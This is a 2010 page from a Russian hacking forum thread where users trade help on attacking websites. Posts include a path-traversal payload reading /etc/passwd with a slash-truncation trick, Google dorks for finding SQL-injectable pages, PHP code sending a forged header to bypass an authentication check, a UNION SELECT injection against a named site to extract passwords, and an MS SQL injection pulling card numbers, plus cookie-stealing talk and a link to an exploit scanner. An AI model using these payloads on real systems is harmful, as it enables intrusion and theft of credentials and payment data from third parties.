Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. M@iL

    M@iL New Member

    Joined:
    26 Dec 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Сайт где именно не буду говорить ) просто может кто встречался с этим случием и знает что делать.. у меня такое не с одним сайтом вообще встречалось.. как так, в опере есть кук с хешем: bbpassword а сниффер не ловит его.. как быть..
     
    #12341 M@iL, 14 Apr 2010
    Last edited: 14 Apr 2010
  2. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    что делать если такая ошибка
    Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../../../../etc/pass\0/copyright.php) is not within the allowed path(s): (/hosting/site.ru/htdocs/) in /hosting/site.ru/htdocs/includes/javascript.php on line 59

    адрес такой: site.ru/modules.php?name=../../../../../../../etc/pass
    site.ru/modules.php?name= ставлю ссылку на шелл - заплатка стоит
     
  3. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91
    https://forum.antichat.ru/thread98525.html
     
    2 people like this.
  4. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2

    не то или я не умею
     
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=

    и т.д.
     
  6. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    Во первых - нету такого файла pass, есть файл passwd

    Проблема в magic_quotes.

    Пример для Unix сервера:
    Code:
    site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
    4095 - это минимальное количество слешей.

    Но подобный способ довольно таки редко получается провести.
     
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    тоесть sql helper 2.7, Pangolin etc...?
     
    _________________________
  8. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    [Feldmarschall],

    нет конечно.

    Эти программы для тупых и для ленивых! Мне не нужно, чтобы за меня делали мою работу. Мне нужен материал, с каким нужно работать.
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196





    нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.
     
    1 person likes this.
  10. Zilt0

    Zilt0 New Member

    Joined:
    1 Apr 2009
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Всем привет,
    есть в общем скрипт авторизации,
    исходник примерно такой:
    if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}

    Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
    буду очень благодарен за любые подсказки,
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196

    послать заголовок A=admin
     
    #12351 попугай, 14 Apr 2010
    Last edited: 14 Apr 2010
    1 person likes this.
  12. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    http://slil.ru/28959824
    пасс: antichat
     
  13. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Redwood
    скинь сюда название, полное
     
  14. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    SQLi/XSS/LFI/RFI Exploit Scanner
     
    2 people like this.
  15. Zilt0

    Zilt0 New Member

    Joined:
    1 Apr 2009
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0

    решено,
    спасибо огромное!!!
     
    #12355 Zilt0, 14 Apr 2010
    Last edited: 14 Apr 2010
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,008
    Likes Received:
    996
    Reputations:
    155
    Просто "A"
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196

    надо не HTTP_A, а A.


    вот на php пример
    PHP:
    echo get('www.entropy.ch''/software/MacOSX/php/test.php''http://google.com/''firefox''');
    function 
    get($hostname$path$ref$ua$cook)
    {
        
    $line="";
        
    $fp=fsockopen($hostname80$errno$errstr60);
        
            if(!
    $fp) echo $errstr($errno);
                else
                {
                    
    $headers "GET $path HTTP/1.1\r\n";
                    
    $headers .="Host: $hostname\r\n";
                    
    $headers .="User-Agent: $ua\r\n";
                    
    $headers .= "Accept-Language: en,en-US;q=0.9,en;q=0.8\r\n";
                    
    $headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
                    
    $headers .="Cookie: $cook\r\n";
                    
    $headers .="A: admin\r\n";
                    
    $headers .="Connection: Close\r\n";
                    
    $headers .="Referer: $ref\r\n\r\n";
                    
                    
    fwrite($fp$headers);
                    

                        while(!
    feof($fp)){
                                
                            
    $line .= fgets($fp1024);
                        }
                    
                    
    fclose($fp);
                }

        return 
    $line;
    }
     
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    http://www.kino.ru/forum.php?id=-2274+union+select+1,2,3--
    помогите найти столбец паролей. Нашел мыла, логины, пароли найти не могу.
    Версия: 4
     
  19. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).
     
  20. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    эмм...
    вот такая проблема
    MS SQL /Version:
    Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
    Aug 6 2000 00:57:48
    Copyright (c) 1988-2000 Microsoft Corporation
    Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

    когда делаю вот такой запрос:
    1'+or+1=(select+top+1+CardNumber+from+CCards)--
    и в ответ




    hex,aes_encrypt(aes_.. не идут


    Original


    остольные columns все идут..
     
    _________________________
    #12360 Дирижабль, 15 Apr 2010
    Last edited: 23 Apr 2010
Loading...
Thread Status:
Not open for further replies.